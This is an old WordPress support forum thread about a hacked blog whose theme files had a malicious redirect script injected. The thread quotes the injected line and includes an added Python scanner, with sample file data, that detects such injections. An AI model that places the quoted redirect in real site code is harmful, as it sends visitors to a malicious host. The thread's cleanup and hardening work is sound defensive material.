A friend's site was hacked... (4 posts)

  1. tginsandiego
    Member
    Posted 2 years ago

    Hey folks,

    My friend (who is awfully sweet, but not very technical) just had her WordPress blog hijacked. I'm technical, but not familiar with WordPress -- I used an HTTP traffic sniffer to find the offending code:

    <script>location="http://mapstracker.cn/?pid=317&sid=84dd6f";</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
    <head profile="http://gmpg.org/xfn/11">

    Notice the <script> that gets sent even before the DOCTYPE...

    But I'm in the dark about how wordpress generates the pages, and I'm unfamiliar with webpage script injection.

    Are there any good samaritans out there that could
    1. Help me fix her site
    2. Help her harden her installation so it doesn't happen again?

    Thanks

    Terry

  2. tginsandiego
    Member
    Posted 2 years ago

    PS -- I was able to determine that she is using WordPress version 2.8.6

  3. tginsandiego
    Member
    Posted 2 years ago

    Found and fixed the bad code. They had injected the script tags into header.php and 404.php inside the theme.

    Once I had backed up the site to my local hard disk, I was able to use a find-file tool to search the entire site and locate the offending code pretty easily. Searching for <script> quickly located the code, because all of the real/good script tags used by WordPress typically don't close the tag without specifying a text/javascript type.

    So the important lesson I learned was to use a traffic sniffer (like Fiddler) to quickly see what's going on.

    I would still appreciate it if some kind expert could help my friend harden her site.

    Thanks

    Terry
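A small scanner that automates the search Terry describes above, added here as an example and not something posted in the thread. It assumes a local backup of the site on disk and flags the three things the thread points out: a script tag ahead of the DOCTYPE, a bare <script> with no type attribute, and an inline location= redirect to an external host; the sample file contents are constructed, modelled on the snippet quoted in the first post.

```python
"""Scan a backed-up WordPress site for injected <script> tags."""
import os
import re

# Heuristics taken from the thread: the injected tag was a bare <script> with no
# type attribute, it was emitted before <!DOCTYPE>, and it forced a redirect.
BARE_SCRIPT = re.compile(r"<script\s*>", re.IGNORECASE)
ANY_SCRIPT = re.compile(r"<script\b", re.IGNORECASE)
DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
REDIRECT = re.compile(
    r'''(?:window\.)?location(?:\.href)?\s*=\s*["']https?://([^"'/]+)''', re.IGNORECASE)

# Constructed sample inputs (not real files): the infected header from the
# thread, and a clean one whose script tags all carry type="text/javascript".
INFECTED_HEADER = (
    '<script>location="http://mapstracker.cn/?pid=317&sid=84dd6f";</script>'
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n'
    '<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">\n'
    '<head profile="http://gmpg.org/xfn/11">\n'
    '<script type="text/javascript" src="/wp-includes/js/comment-reply.js"></script>\n'
)
CLEAN_HEADER = (
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n'
    '<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">\n'
    '<script type="text/javascript" src="/wp-includes/js/jquery/jquery.js"></script>\n'
    '<script type="text/javascript">var wpClean = 1;</script>\n'
)


def scan_content(name, text):
    """Return a list of (file name, reason) findings for one file's contents."""
    findings = []
    doc, first = DOCTYPE.search(text), ANY_SCRIPT.search(text)
    if doc and first and first.start() < doc.start():
        findings.append((name, "script tag appears before <!DOCTYPE>"))
    for m in BARE_SCRIPT.finditer(text):
        findings.append((name, "bare <script> without type attribute at offset %d" % m.start()))
    for m in REDIRECT.finditer(text):
        findings.append((name, "inline redirect to external host %s" % m.group(1)))
    return findings


def scan_tree(root):
    """Walk a local copy of the site and scan every .php and .html file."""
    results = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith((".php", ".html")):
                path = os.path.join(dirpath, f)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    results.extend(scan_content(path, fh.read()))
    return results
```

Run scan_tree() against the backup directory; on a clean 2.8-era theme it should return nothing, and any hit in header.php, footer.php or 404.php is the place to look first.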

  4. alism
    Member
    Posted 2 years ago

    Couldn't you have just right clicked, then viewed the page source? I think a traffic sniffer is perhaps overkill for this particular problem, but if it worked for you, great! Did you check the sql database itself too by the way?

    Anyway, why was she hacked? Not keeping her version of WordPress up to date? Rubbish host? Other insecure script? Obvious password?

    There's a good hack clean guide here:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    Hardening wise, think about htpasswd protecting her wp-admin folder. If you can limit access to a certain IP, even better.

    Make sure there's a good backup routine in place. You can download plugins to do this automagically, e.g.:
    http://wordpress.org/extend/plugins/wp-db-backup/

    Change all passwords, admin, database and FTP to something strong.

    Have a read of this too:
    http://codex.wordpress.org/Hardening_WordPress

Topic Closed

This topic has been closed to new replies.